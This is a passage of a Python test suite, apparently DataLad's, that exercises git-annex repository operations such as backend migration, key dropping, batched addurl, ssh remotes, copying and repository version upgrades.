'SHA256E')\n\n # migrating will only do, if file is present\n ok_annex_get(ar, 'test-annex.dat')\n\n eq_(ar.get_file_backend('test-annex.dat'), 'SHA256E')\n ar.migrate_backend('test-annex.dat')\n eq_(ar.get_file_backend('test-annex.dat'), 'MD5')\n\n ar.migrate_backend('', backend='SHA1')\n eq_(ar.get_file_backend(filename), 'SHA1')\n eq_(ar.get_file_backend('test-annex.dat'), 'SHA1')\n\n\ntree1args = dict(\n tree=(\n ('firstfile', 'whatever'),\n ('secondfile', 'something else'),\n ('remotefile', 'pretends to be remote'),\n ('faraway', 'incredibly remote')),\n)\n\n# keys for files if above tree is generated and added to annex with MD5E backend\ntree1_md5e_keys = {\n 'firstfile': 'MD5E-s8--008c5926ca861023c1d2a36653fd88e2',\n 'faraway': 'MD5E-s17--5b849ed02f914d3bbb5038fe4e3fead9',\n 'secondfile': 'MD5E-s14--6c7ba9c5a141421e1c03cb9807c97c74',\n 'remotefile': 'MD5E-s21--bf7654b3de20d5926d407ea7d913deb0'\n}\n\n# this code is only here for documentation purposes\n# @with_tree(**tree1args)\n# def __test_get_md5s(path):\n# # was used just to generate above dict\n# annex = AnnexRepo(path, init=True, backend='MD5E')\n# files = [basename(f) for f in find_files('.*', path)]\n# annex.add(files)\n# annex.commit()\n# print({f: p['key'] for f, p in annex.get_content_annexinfo(files)})\n\n\n@with_parametric_batch\n@with_tree(**tree1args)\ndef test_dropkey(path=None, *, batch):\n kw = {'batch': batch}\n annex = AnnexRepo(path, init=True, backend='MD5E')\n files = list(tree1_md5e_keys)\n annex.add(files)\n annex.commit()\n # drop one key\n annex.drop_key(tree1_md5e_keys[files[0]], **kw)\n # drop multiple\n annex.drop_key([tree1_md5e_keys[f] for f in files[1:3]], **kw)\n # drop already dropped -- should work as well atm\n # https://git-annex.branchable.com/bugs/dropkey_--batch_--json_--force_is_always_succesfull\n annex.drop_key(tree1_md5e_keys[files[0]], **kw)\n # and a mix with already dropped or not\n annex.drop_key(list(tree1_md5e_keys.values()), **kw)\n # AnnexRepo is not able to guarantee that all batched processes are\n # terminated when test cleanup code runs, avoid a crash (i.e. resource busy)\n annex._batched.close()\n\n\n@with_tree(**tree1args)\n@serve_path_via_http()\ndef test_AnnexRepo_backend_option(path=None, url=None):\n ar = AnnexRepo(path, backend='MD5')\n\n # backend recorded in .gitattributes\n eq_(ar.get_gitattributes('.')['.']['annex.backend'], 'MD5')\n\n ar.add('firstfile', backend='SHA1')\n ar.add('secondfile')\n eq_(ar.get_file_backend('firstfile'), 'SHA1')\n eq_(ar.get_file_backend('secondfile'), 'MD5')\n\n with swallow_outputs() as cmo:\n # must be added under different name since annex 20160114\n ar.add_url_to_file('remotefile2', url + 'remotefile', backend='SHA1')\n eq_(ar.get_file_backend('remotefile2'), 'SHA1')\n\n with swallow_outputs() as cmo:\n ar.add_url_to_file('from_faraway', url + 'faraway', backend='SHA1')\n eq_(ar.get_file_backend('from_faraway'), 'SHA1')\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get_file_backend(src=None, dst=None):\n origin = AnnexRepo(src, create=True)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save()\n\n ar = AnnexRepo.clone(src, dst)\n\n eq_(ar.get_file_backend('test-annex.dat'), 'SHA256E')\n # no migration\n ok_annex_get(ar, 'test-annex.dat', network=False)\n ar.migrate_backend('test-annex.dat', backend='SHA1')\n eq_(ar.get_file_backend('test-annex.dat'), 'SHA1')\n\n\n@skip_if_adjusted_branch\n@with_tempfile\ndef test_AnnexRepo_always_commit(path=None):\n\n repo = AnnexRepo(path)\n\n def get_annex_commit_counts():\n return len(repo.get_revisions(\"git-annex\"))\n\n n_annex_commits_initial = get_annex_commit_counts()\n\n file1 = get_most_obscure_supported_name() + \"_1\"\n file2 = get_most_obscure_supported_name() + \"_2\"\n with open(opj(path, file1), 'w') as f:\n f.write(\"First file.\")\n with open(opj(path, file2), 'w') as f:\n f.write(\"Second file.\")\n\n # always_commit == True is expected to be default\n repo.add(file1)\n\n # Now git-annex log should show the addition:\n out_list = list(repo.call_annex_items_(['log']))\n eq_(len(out_list), 1)\n\n quote = lambda s: s.replace('\"', r'\\\"')\n def assert_in_out(filename, out):\n filename_quoted = quote(filename)\n if repo._check_version_kludges('quotepath-respected') == \"no\":\n assert_in(filename, out)\n elif repo._check_version_kludges('quotepath-respected') == \"maybe\":\n assert filename in out or filename_quoted in out\n else:\n assert_in(filename_quoted, out)\n assert_in_out(file1, out_list[0])\n\n # check git log of git-annex branch:\n # expected: initial creation, update (by annex add) and another\n # update (by annex log)\n eq_(get_annex_commit_counts(), n_annex_commits_initial + 1)\n\n with patch.object(repo, \"always_commit\", False):\n repo.add(file2)\n\n # No additional git commit:\n eq_(get_annex_commit_counts(), n_annex_commits_initial + 1)\n\n out = repo.call_annex(['log'])\n\n # And we see only the file before always_commit was set to false:\n assert_in_out(file1, out)\n assert_not_in(file2, out)\n assert_not_in(quote(file2), out)\n\n # With always_commit back to True, do something that will trigger a commit\n # on the annex branches.\n repo.call_annex(['sync'])\n\n out = repo.call_annex(['log'])\n assert_in_out(file1, out)\n assert_in_out(file2, out)\n\n # Now git knows as well:\n eq_(get_annex_commit_counts(), n_annex_commits_initial + 2)\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_on_uninited_annex(src=None, path=None):\n origin = AnnexRepo(src, create=True)\n (origin.pathobj / 'test-annex.dat').write_text(\"content\")\n origin.save()\n # \"Manually\" clone to avoid initialization:\n runner = Runner()\n runner.run([\"git\", \"clone\", origin.path, path])\n\n assert_false(exists(opj(path, '.git', 'annex'))) # must not be there for this test to be valid\n annex = AnnexRepo(path, create=False, init=False) # so we can initialize without\n # and still can get our things\n assert_false(annex.file_has_content('test-annex.dat'))\n annex.get('test-annex.dat')\n ok_(annex.file_has_content('test-annex.dat'))\n\n\n@assert_cwd_unchanged\n@with_tempfile\ndef test_AnnexRepo_commit(path=None):\n\n ds = AnnexRepo(path, create=True)\n filename = opj(path, get_most_obscure_supported_name())\n with open(filename, 'w') as f:\n f.write(\"File to add to git\")\n ds.add(filename, git=True)\n\n assert_raises(AssertionError, assert_repo_status, path, annex=True)\n\n ds.commit(\"test _commit\")\n assert_repo_status(path, annex=True)\n\n # nothing to commit doesn't raise by default:\n ds.commit()\n # but does with careless=False:\n assert_raises(CommandError, ds.commit, careless=False)\n\n # committing untracked file raises:\n with open(opj(path, \"untracked\"), \"w\") as f:\n f.write(\"some\")\n assert_raises(FileNotInRepositoryError, ds.commit, files=\"untracked\")\n # not existing file as well:\n assert_raises(FileNotInRepositoryError, ds.commit, files=\"not-existing\")\n\n\n@with_tempfile\ndef test_AnnexRepo_add_to_annex(path=None):\n repo = AnnexRepo(path)\n\n assert_repo_status(repo, annex=True)\n filename = get_most_obscure_supported_name()\n filename_abs = opj(repo.path, filename)\n with open(filename_abs, \"w\") as f:\n f.write(\"some\")\n\n out_json = repo.add(filename)\n # file is known to annex:\n ok_(repo.is_under_annex(filename_abs),\n \"Annexed file is not a link.\")\n assert_in('key', out_json)\n key = repo.get_file_annexinfo(filename)['key']\n assert_false(key == '')\n assert_equal(key, out_json['key'])\n ok_(repo.file_has_content(filename))\n\n # uncommitted:\n ok_(repo.dirty)\n\n repo.commit(\"Added file to annex.\")\n assert_repo_status(repo, annex=True)\n\n # now using commit/msg options:\n filename = \"another.txt\"\n with open(opj(repo.path, filename), \"w\") as f:\n f.write(\"something else\")\n\n repo.add(filename)\n repo.commit(msg=\"Added another file to annex.\")\n # known to annex:\n fileprops = repo.get_file_annexinfo(filename, eval_availability=True)\n ok_(fileprops['key'])\n ok_(fileprops['has_content'])\n\n # and committed:\n assert_repo_status(repo, annex=True)\n\n\n@with_tempfile\ndef test_AnnexRepo_add_to_git(path=None):\n repo = AnnexRepo(path)\n\n assert_repo_status(repo, annex=True)\n filename = get_most_obscure_supported_name()\n with open(opj(repo.path, filename), \"w\") as f:\n f.write(\"some\")\n repo.add(filename, git=True)\n\n # not in annex, but in git:\n eq_(repo.get_file_annexinfo(filename), {})\n # uncommitted:\n ok_(repo.dirty)\n repo.commit(\"Added file to annex.\")\n assert_repo_status(repo, annex=True)\n\n # now using commit/msg options:\n filename = \"another.txt\"\n with open(opj(repo.path, filename), \"w\") as f:\n f.write(\"something else\")\n\n repo.add(filename, git=True)\n repo.commit(msg=\"Added another file to annex.\")\n # not in annex, but in git:\n eq_(repo.get_file_annexinfo(filename), {})\n\n # and committed:\n assert_repo_status(repo, annex=True)\n\n\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get(src=None, dst=None):\n ar = AnnexRepo(src)\n (ar.pathobj / 'test-annex.dat').write_text(\n \"content to be annex-addurl'd\")\n ar.save('some')\n\n annex = AnnexRepo.clone(src, dst)\n assert_is_instance(annex, AnnexRepo, \"AnnexRepo was not created.\")\n testfile = 'test-annex.dat'\n testfile_abs = opj(dst, testfile)\n assert_false(annex.file_has_content(\"test-annex.dat\"))\n with swallow_outputs():\n annex.get(testfile)\n ok_(annex.file_has_content(\"test-annex.dat\"))\n ok_file_has_content(testfile_abs, \"content to be annex-addurl'd\", strip=True)\n\n called = []\n # for some reason yoh failed mock to properly just call original func\n orig_run = annex._git_runner.run_on_filelist_chunks\n\n def check_run(cmd, files, **kwargs):\n cmd_name = cmd[cmd.index('annex') + 1]\n called.append(cmd_name)\n if cmd_name == 'find':\n assert_not_in('-J5', cmd)\n elif cmd_name == 'get':\n assert_in('-J5', cmd)\n else:\n raise AssertionError(\n \"no other commands so far should be ran. Got %s\" % cmd\n )\n return orig_run(cmd, files, **kwargs)\n\n annex.drop(testfile)\n with patch.object(GitWitlessRunner, 'run_on_filelist_chunks',\n side_effect=check_run), \\\n swallow_outputs():\n annex.get(testfile, jobs=5)\n eq_(called, ['find', 'get'])\n ok_file_has_content(testfile_abs, \"content to be annex-addurl'd\", strip=True)\n\n\n@with_tree(tree={'file.dat': 'content'})\n@with_tempfile\ndef test_v7_detached_get(opath=None, path=None):\n # http://git-annex.branchable.com/bugs/get_fails_to_place_v7_unlocked_file_content_into_the_file_tree_in_v7_in_repo_with_detached_HEAD/\n origin = AnnexRepo(opath, create=True, version=7)\n GitRepo.add(origin, 'file.dat') # force direct `git add` invocation\n origin.commit('added')\n\n AnnexRepo.clone(opath, path)\n repo = AnnexRepo(path)\n # test getting in a detached HEAD\n repo.checkout('HEAD^{}')\n repo.call_annex(['upgrade']) # TODO: .upgrade ?\n\n repo.get('file.dat')\n ok_file_has_content(op.join(repo.path, 'file.dat'), \"content\")\n\n\n# TODO:\n#def init_remote(self, name, options):\n#def enable_remote(self, name):\n\[email protected](\"batch\", [False, True])\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_AnnexRepo_get_contentlocation(src=None, path=None, work_dir_outside=None, *, batch):\n ar = AnnexRepo(src)\n (ar.pathobj / 'test-annex.dat').write_text(\n \"content to be annex-addurl'd\")\n ar.save('some')\n\n annex = AnnexRepo.clone(src, path)\n fname = 'test-annex.dat'\n key = annex.get_file_annexinfo(fname)['key']\n # MIH at this point the whole test and get_contentlocation() itself\n # is somewhat moot. The above call already has properties like\n # 'hashdirmixed', 'hashdirlower', and 'key' from which the location\n # could be built.\n # with eval_availability=True, it also has 'objloc' with a absolute\n # path to a verified annex key location\n\n # TODO: see if we can avoid this or specify custom exception\n eq_(annex.get_contentlocation(key, batch=batch), '')\n\n with swallow_outputs() as cmo:\n annex.get(fname)\n key_location = annex.get_contentlocation(key, batch=batch)\n assert(key_location)\n\n if annex.is_managed_branch():\n # the rest of the test assumes annexed files being symlinks\n return\n\n # they both should point to the same location eventually\n eq_((annex.pathobj / fname).resolve(),\n (annex.pathobj / key_location).resolve())\n\n # test how it would look if done under a subdir of the annex:\n with chpwd(opj(annex.path, 'subdir'), mkdir=True):\n key_location = annex.get_contentlocation(key, batch=batch)\n # they both should point to the same location eventually\n eq_((annex.pathobj / fname).resolve(),\n (annex.pathobj / key_location).resolve())\n\n # test how it would look if done under a dir outside of the annex:\n with chpwd(work_dir_outside, mkdir=True):\n key_location = annex.get_contentlocation(key, batch=batch)\n # they both should point to the same location eventually\n eq_((annex.pathobj / fname).resolve(),\n (annex.pathobj / key_location).resolve())\n\n\n@known_failure_windows\n@with_tree(tree=(('about.txt', 'Lots of abouts'),\n ('about2.txt', 'more abouts'),\n ('about2_.txt', 'more abouts_'),\n ('d', {'sub.txt': 'more stuff'})))\n@serve_path_via_http()\n@with_tempfile\ndef test_AnnexRepo_addurl_to_file_batched(sitepath=None, siteurl=None, dst=None):\n\n if dl_cfg.get('datalad.fake-dates'):\n raise SkipTest(\n \"Faked dates are enabled; skipping batched addurl tests\")\n\n ar = AnnexRepo(dst, create=True)\n testurl = urljoin(siteurl, 'about.txt')\n testurl2 = urljoin(siteurl, 'about2.txt')\n testurl2_ = urljoin(siteurl, 'about2_.txt')\n testurl3 = urljoin(siteurl, 'd/sub.txt')\n url_file_prefix = urlsplit(testurl).netloc.split(':')[0]\n testfile = 'about.txt'\n testfile2 = 'about2.txt'\n testfile2_ = 'about2_.txt'\n testfile3 = opj('d', 'sub.txt')\n\n # add to an existing but not committed file\n # TODO: __call__ of the BatchedAnnex must be checked to be called\n copyfile(opj(sitepath, 'about.txt'), opj(dst, testfile))\n # must crash sensibly since file exists, we shouldn't addurl to non-annexed files\n with assert_raises(AnnexBatchCommandError):\n ar.add_url_to_file(testfile, testurl, batch=True)\n\n # Remove it and re-add\n unlink(opj(dst, testfile))\n ar.add_url_to_file(testfile, testurl, batch=True)\n\n info = ar.info(testfile)\n eq_(info['size'], 14)\n assert(info['key'])\n # not even added to index yet since we this repo is with default batch_size\n assert_not_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile))\n\n # TODO: none of the below should re-initiate the batch process\n\n # add to an existing and staged annex file\n copyfile(opj(sitepath, 'about2.txt'), opj(dst, testfile2))\n ar.add(testfile2)\n ar.add_url_to_file(testfile2, testurl2, batch=True)\n assert(ar.info(testfile2))\n # not committed yet\n # assert_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile2))\n\n # add to an existing and committed annex file\n copyfile(opj(sitepath, 'about2_.txt'), opj(dst, testfile2_))\n ar.add(testfile2_)\n if ar.is_direct_mode():\n assert_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile))\n else:\n assert_not_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile))\n ar.commit(\"added about2_.txt and there was about2.txt lingering around\")\n # commit causes closing all batched annexes, so testfile gets committed\n assert_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile))\n assert(not ar.dirty)\n ar.add_url_to_file(testfile2_, testurl2_, batch=True)\n assert(ar.info(testfile2_))\n assert_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(testfile2_))\n\n # add into a new file\n # filename = 'newfile.dat'\n filename = get_most_obscure_supported_name()\n\n # Note: The following line was necessary, since the test setup just\n # doesn't work with singletons\n # TODO: Singleton mechanic needs a general solution for this\n AnnexRepo._unique_instances.clear()\n ar2 = AnnexRepo(dst, batch_size=1)\n\n with swallow_outputs():\n eq_(len(ar2._batched), 0)\n ar2.add_url_to_file(filename, testurl, batch=True)\n eq_(len(ar2._batched), 1) # we added one more with batch_size=1\n ar2.precommit() # to possibly stop batch process occupying the stdout\n ar2.commit(\"added new file\") # would do nothing ATM, but also doesn't fail\n assert_in(filename, ar2.get_files())\n assert_in(WEB_SPECIAL_REMOTE_UUID, ar2.whereis(filename))\n\n ar.commit(\"actually committing new files\")\n assert_in(filename, ar.get_files())\n assert_in(WEB_SPECIAL_REMOTE_UUID, ar.whereis(filename))\n # this poor bugger still wasn't added since we used default batch_size=0 on him\n\n # and closing the pipes now shouldn't anyhow affect things\n eq_(len(ar._batched), 1)\n ar._batched.close()\n eq_(len(ar._batched), 1) # doesn't remove them, just closes\n assert(not ar.dirty)\n\n ar._batched.clear()\n eq_(len(ar._batched), 0) # .clear also removes\n\n raise SkipTest(\"TODO: more, e.g. add with a custom backend\")\n # TODO: also with different modes (relaxed, fast)\n # TODO: verify that file is added with that backend and that we got a new batched process\n\n\n@with_tree(tree={\"foo\": \"foo content\"})\n@serve_path_via_http()\n@with_tree(tree={\"bar\": \"bar content\"})\ndef test_annexrepo_fake_dates_disables_batched(sitepath=None, siteurl=None, dst=None):\n ar = AnnexRepo(dst, create=True, fake_dates=True)\n\n with swallow_logs(new_level=logging.DEBUG) as cml:\n ar.add_url_to_file(\"foo-dst\", urljoin(siteurl, \"foo\"), batch=True)\n cml.assert_logged(\n msg=\"Not batching addurl call because fake dates are enabled\",\n level=\"DEBUG\",\n regex=False)\n\n ar.add(\"bar\")\n ar.commit(\"add bar\")\n key = ar.get_content_annexinfo([\"bar\"]).popitem()[1]['key']\n\n with swallow_logs(new_level=logging.DEBUG) as cml:\n ar.drop_key(key, batch=True)\n cml.assert_logged(\n msg=\"Not batching drop_key call because fake dates are enabled\",\n level=\"DEBUG\",\n regex=False)\n\n\n@with_tempfile(mkdir=True)\ndef test_annex_backends(path=None):\n path = Path(path)\n repo_default = AnnexRepo(path / \"r_default\")\n eq_(repo_default.default_backends, None)\n\n repo_kw = AnnexRepo(path / \"repo_kw\", backend='MD5E')\n eq_(repo_kw.default_backends, ['MD5E'])\n\n # persists\n repo_kw = AnnexRepo(path / \"repo_kw\")\n eq_(repo_kw.default_backends, ['MD5E'])\n\n repo_config = AnnexRepo(path / \"repo_config\")\n repo_config.config.set(\"annex.backend\", \"MD5E\", reload=True)\n eq_(repo_config.default_backends, [\"MD5E\"])\n\n repo_compat = AnnexRepo(path / \"repo_compat\")\n repo_compat.config.set(\"annex.backends\", \"MD5E WORM\", reload=True)\n eq_(repo_compat.default_backends, [\"MD5E\", \"WORM\"])\n\n\n# ignore deprecation warnings since here we should not use high level\n# interface like push\[email protected](r\"ignore: AnnexRepo.copy_to\\(\\) is deprecated\")\n@skip_nomultiplex_ssh # too much of \"multiplex\" testing\n@with_tempfile(mkdir=True)\ndef test_annex_ssh(topdir=None):\n # On Xenial, this hangs with a recent git-annex. It bisects to git-annex's\n # 7.20191230-142-g75059c9f3. This is likely due to an interaction with an\n # older openssh version. See\n # https://git-annex.branchable.com/bugs/SSH-based_git-annex-init_hang_on_older_systems___40__Xenial__44___Jessie__41__/\n if external_versions['cmd:system-ssh'] < '7.4' and \\\n external_versions['cmd:annex'] <= '8.20200720.1':\n raise SkipTest(\"Test known to hang\")\n\n topdir = Path(topdir)\n rm1 = AnnexRepo(topdir / \"remote1\", create=True)\n rm2 = AnnexRepo.clone(rm1.path, str(topdir / \"remote2\"))\n rm2.remove_remote(DEFAULT_REMOTE)\n\n main_tmp = AnnexRepo.clone(rm1.path, str(topdir / \"main\"))\n main_tmp.remove_remote(DEFAULT_REMOTE)\n repo_path = main_tmp.path\n del main_tmp\n remote_1_path = rm1.path\n remote_2_path = rm2.path\n\n from datalad import ssh_manager\n\n # check whether we are the first to use these sockets:\n hash_1 = get_connection_hash('datalad-test')\n socket_1 = opj(str(ssh_manager.socket_dir), hash_1)\n hash_2 = get_connection_hash('datalad-test2')\n socket_2 = opj(str(ssh_manager.socket_dir), hash_2)\n datalad_test_was_open = exists(socket_1)\n datalad_test2_was_open = exists(socket_2)\n\n # repo to test:AnnexRepo(repo_path)\n # At first, directly use git to add the remote, which should be recognized\n # by AnnexRepo's constructor\n gr = GitRepo(repo_path, create=True)\n gr.add_remote(\"ssh-remote-1\", \"ssh://datalad-test\" + remote_1_path)\n\n ar = AnnexRepo(repo_path, create=False)\n\n # socket was not touched:\n if datalad_test_was_open:\n ok_(exists(socket_1))\n else:\n ok_(not exists(socket_1))\n\n # remote interaction causes socket to be created:\n (ar.pathobj / \"foo\").write_text(\"foo\")\n (ar.pathobj / \"bar\").write_text(\"bar\")\n ar.add(\"foo\")\n ar.add(\"bar\")\n ar.commit(\"add files\")\n\n ar.copy_to([\"foo\"], remote=\"ssh-remote-1\")\n # copy_to() opens it if needed.\n #\n # Note: This isn't racy because datalad-sshrun should not close this itself\n # because the connection was either already open before this test or\n # copy_to(), not the underlying git-annex/datalad-sshrun call, opens it.\n ok_(exists(socket_1))\n\n # add another remote:\n ar.add_remote('ssh-remote-2', \"ssh://datalad-test2\" + remote_2_path)\n\n # socket was not touched:\n if datalad_test2_was_open:\n # FIXME: occasionally(?) fails in V6:\n # ok_(exists(socket_2))\n pass\n else:\n ok_(not exists(socket_2))\n\n # copy to the new remote:\n #\n # Same racy note as the copy_to() call above.\n ar.copy_to([\"foo\"], remote=\"ssh-remote-2\")\n\n if not exists(socket_2): # pragma: no cover\n # @known_failure (marked for grep)\n raise SkipTest(\"test_annex_ssh hit known failure (gh-4781)\")\n\n # Check that git-annex is actually using datalad-sshrun.\n fail_cmd = quote_cmdlinearg(sys.executable) + \"-c 'assert 0'\"\n with patch.dict('os.environ', {'GIT_SSH_COMMAND': fail_cmd}):\n with assert_raises(CommandError):\n ar.copy_to([\"bar\"], remote=\"ssh-remote-2\")\n ar.copy_to([\"bar\"], remote=\"ssh-remote-2\")\n\n ssh_manager.close(ctrl_path=[socket_1, socket_2])\n\n\n@with_tempfile\ndef test_annex_remove(path=None):\n ar = AnnexRepo(path)\n (ar.pathobj / 'test-annex.dat').write_text(\n \"content to be annex-addurl'd\")\n ar.save('some')\n\n repo = AnnexRepo(path, create=False)\n\n file_list = list(repo.get_content_annexinfo(init=None))\n assert len(file_list) >= 1\n # remove a single file\n out = repo.remove(str(file_list[0]))\n assert_not_in(file_list[0], repo.get_content_annexinfo(init=None))\n eq_(out[0], str(file_list[0].relative_to(repo.pathobj)))\n\n with open(opj(repo.path, \"rm-test.dat\"), \"w\") as f:\n f.write(\"whatever\")\n\n # add it\n repo.add(\"rm-test.dat\")\n\n # remove without '--force' should fail, due to staged changes:\n assert_raises(CommandError, repo.remove, \"rm-test.dat\")\n assert_in(\"rm-test.dat\", repo.get_annexed_files())\n\n # now force:\n out = repo.remove(\"rm-test.dat\", force=True)\n assert_not_in(\"rm-test.dat\", repo.get_annexed_files())\n eq_(out[0], \"rm-test.dat\")\n\n\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_repo_version_upgrade(path1=None, path2=None, path3=None):\n with swallow_logs(new_level=logging.INFO) as cm:\n # Since git-annex 7.20181031, v6 repos upgrade to v7.\n # Future proofing: We will test on v6 as long as it is upgradeable,\n # but would switch to first upgradeable after\n Uversion = 6 if 6 in _GIT_ANNEX_VERSIONS_INFO[\"upgradable\"] \\\n else _GIT_ANNEX_VERSIONS_INFO[\"upgradeable\"][0]\n v_first_supported = next(i for i in _GIT_ANNEX_VERSIONS_INFO[\"supported\"] if i >= Uversion)\n annex = AnnexRepo(path1, create=True, version=Uversion)\n assert_repo_status(path1, annex=True)\n v_upgraded_to = int(annex.config.get('annex.version'))\n\n if external_versions['cmd:annex'] <= '10.20220724':\n eq_(v_upgraded_to, v_first_supported)\n assert_in(\"will be upgraded to 8\", cm.out)\n else:\n # 10.20220724-5-g63cef2ae0 started to auto-upgrade to 10, although 8 was the\n # lowest supported. In general we can only assert that we upgrade into one\n # of the supported\n assert_in(v_upgraded_to, _GIT_ANNEX_VERSIONS_INFO[\"supported\"])\n assert_in(\"will be upgraded to %s or later version\" % v_first_supported, cm.out)\n\n # default from config item (via env var):\n with patch.dict('os.environ', {'DATALAD_REPO_VERSION': str(Uversion)}):\n # and check consistency of upgrading to the default version:\n annex = AnnexRepo(path2, create=True)\n version = int(annex.config.get('annex.version'))\n eq_(version, v_upgraded_to)\n\n\[email protected](\"version\", _GIT_ANNEX_VERSIONS_INFO[\"supported\"])\ndef test_repo_version_supported(version, tmp_path):\n # default from config item (via env var):\n Uversion = _GIT_ANNEX_VERSIONS_INFO[\"upgradable\"][0]\n with patch.dict('os.environ', {'DATALAD_REPO_VERSION': str(Uversion)}):\n # ...parameter `version` still has priority over default config:\n annex = AnnexRepo(str(tmp_path), create=True, version=version)\n annex_version = int(annex.config.get('annex.version'))\n if not annex.is_managed_branch():\n # There is no \"upgrade\" for any of the supported versions.\n # if we are not in adjusted branch\n eq_(annex_version, version)\n else:\n print(\"HERE\")\n # some annex command might have ran to trigger the update\n assert annex_version in {v for v in _GIT_ANNEX_VERSIONS_INFO[\"supported\"] if v >= version}\n\n\n@skip_if(external_versions['cmd:annex'] > '8.20210428', \"Stopped showing if too quick\")\n@with_tempfile\ndef test_init_scanning_message(path=None):\n with swallow_logs(new_level=logging.INFO) as cml:\n AnnexRepo(path, create=True, version=7)\n # somewhere around 8.20210428-186-g428c91606 git annex changed\n # handling of scanning for unlocked files upon init and started to report\n # \"scanning for annexed\" instead of \"scanning for unlocked\".\n # Could be a line among many (as on Windows) so match=False so we search\n assert_re_in(\".*scanning for .* files\", cml.out, flags=re.IGNORECASE, match=False)\n\n\n# ignore deprecation warnings since that is the test testing that functionality\[email protected](r\"ignore: AnnexRepo.copy_to\\(\\) is deprecated\")\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_annex_copy_to(src=None, origin=None, clone=None):\n ar = AnnexRepo(src)\n (ar.pathobj / 'test.dat').write_text(\"123\\n\")\n ar.save('some', git=True)\n (ar.pathobj / 'test-annex.dat').write_text(\"content\")\n ar.save('some')\n\n repo = AnnexRepo.clone(src, origin)\n remote = AnnexRepo.clone(origin, clone)\n repo.add_remote(\"target\", clone)\n\n assert_raises(IOError, repo.copy_to, \"doesnt_exist.dat\", \"target\")\n assert_raises(FileInGitError, repo.copy_to, \"test.dat\", \"target\")\n assert_raises(ValueError, repo.copy_to, \"test-annex.dat\", \"invalid_target\")\n\n # see #3102\n # \"copying\" a dir shouldn't do anything and not raise.\n os.mkdir(opj(repo.path, \"subdir\"))\n repo.copy_to(\"subdir\", \"target\")\n\n # test-annex.dat has no content to copy yet:\n eq_(repo.copy_to(\"test-annex.dat\", \"target\"), [])\n\n repo.get(\"test-annex.dat\")\n # now it has:\n eq_(repo.copy_to(\"test-annex.dat\", \"target\"), [\"test-annex.dat\"])\n # and will not be copied again since it was already copied\n eq_(repo.copy_to([\"test.dat\", \"test-annex.dat\"], \"target\"), [])\n\n # Test that if we pass a list of items and annex processes them nicely,\n # we would obtain a list back. To not stress our tests even more -- let's mock\n def ok_copy(command, **kwargs):\n # Check that we do pass to annex call only the list of files which we\n # asked to be copied\n assert_in('copied1', kwargs['files'])\n assert_in('copied2', kwargs['files'])\n assert_in('existed', kwargs['files'])\n return [\n {\"command\":\"copy\",\"note\":\"to target ...\", \"success\":True,\n \"key\":\"akey1\", \"file\":\"copied1\"},\n {\"command\":\"copy\",\"note\":\"to target ...\", \"success\":True,\n \"key\":\"akey2\", \"file\":\"copied2\"},\n {\"command\":\"copy\",\"note\":\"checking target ...\", \"success\":True,\n \"key\":\"akey3\", \"file\":\"existed\"},\n ]\n # Note that we patch _call_annex_records,\n # which is in turn invoked first by copy_to for \"find\" operation.\n # TODO: provide a dedicated handling within above ok_copy for 'find' command\n with patch.object(repo, '_call_annex_records', ok_copy):\n eq_(repo.copy_to([\"copied2\", \"copied1\", \"existed\"], \"target\"),\n [\"copied1\", \"copied2\"])\n\n # now let's test that we are correctly raising the exception in case if\n # git-annex execution fails\n orig_run = repo._call_annex\n\n # Kinda a bit off the reality since no nonex* would not be returned/handled\n # by _get_expected_files, so in real life -- wouldn't get report about Incomplete!?\n def fail_to_copy(command, **kwargs):\n if command[0] == 'copy':\n # That is not how annex behaves\n # http://git-annex.branchable.com/bugs/copy_does_not_reflect_some_failed_copies_in_--json_output/\n # for non-existing files output goes into stderr\n #\n # stderr output depends on config+version of annex, though:\n if not dl_cfg.getbool(\n section=\"annex\", option=\"skipunknown\",\n # git-annex switched default for this config:\n default=bool(\n external_versions['cmd:annex'] < '10.20220222')):\n\n stderr = \"error: pathspec 'nonex1' did not match any file(s) \" \\\n \"known to git\\n\" \\\n \"error: pathspec 'nonex2' did not match any file(s) \" \\\n \"known to git\\n\"\n else:\n stderr = \"git-annex: nonex1 not found\\n\" \\\n \"git-annex: nonex2 not found\\n\"\n\n raise CommandError(\n \"Failed to run ...\",\n stdout_json=[\n {\"command\":\"copy\",\"note\":\"to target ...\", \"success\":True,\n \"key\":\"akey1\", \"file\":\"copied\"},\n {\"command\":\"copy\",\"note\":\"checking target ...\",\n \"success\":True, \"key\":\"akey2\", \"file\":\"existed\"},\n ],\n stderr=stderr\n )\n else:\n return orig_run(command, **kwargs)\n\n def fail_to_copy_get_expected(files, expr):\n assert files == [\"copied\", \"existed\", \"nonex1\", \"nonex2\"]\n return {'akey1': 10}, [\"copied\"]\n\n with patch.object(repo, '_call_annex', fail_to_copy), \\\n patch.object(repo, '_get_expected_files', fail_to_copy_get_expected):\n with assert_raises(IncompleteResultsError) as cme:\n repo.copy_to([\"copied\", \"existed\", \"nonex1\", \"nonex2\"], \"target\")\n eq_(cme.value.results, [\"copied\"])\n eq_(cme.value.failed, ['nonex1', 'nonex2'])\n\n\n@with_tempfile\n@with_tempfile\ndef test_annex_drop(src=None, dst=None):\n ar = AnnexRepo(src)\n (ar.pathobj / 'test-annex.dat').write_text(\"content\")\n ar.save('some')\n\n ar = AnnexRepo.clone(src, dst)\n testfile = 'test-annex.dat'\n assert_false(ar.file_has_content(testfile))\n ar.get(testfile)\n ok_(ar.file_has_content(testfile))\n eq_(len([f for f in ar.fsck(fast=True) if f['file'] == testfile]), 1)\n\n # drop file by name:\n result = ar.drop([testfile])\n assert_false(ar.file_has_content(testfile))\n ok_(isinstance(result, list))\n eq_(len(result), 1)\n eq_(result[0]['command'], 'drop')\n eq_(result[0]['success'], True)\n eq_(result[0]['file'], testfile)\n\n ar.get(testfile)\n\n # drop file by key:\n testkey = ar.get_file_annexinfo(testfile)['key']\n result = 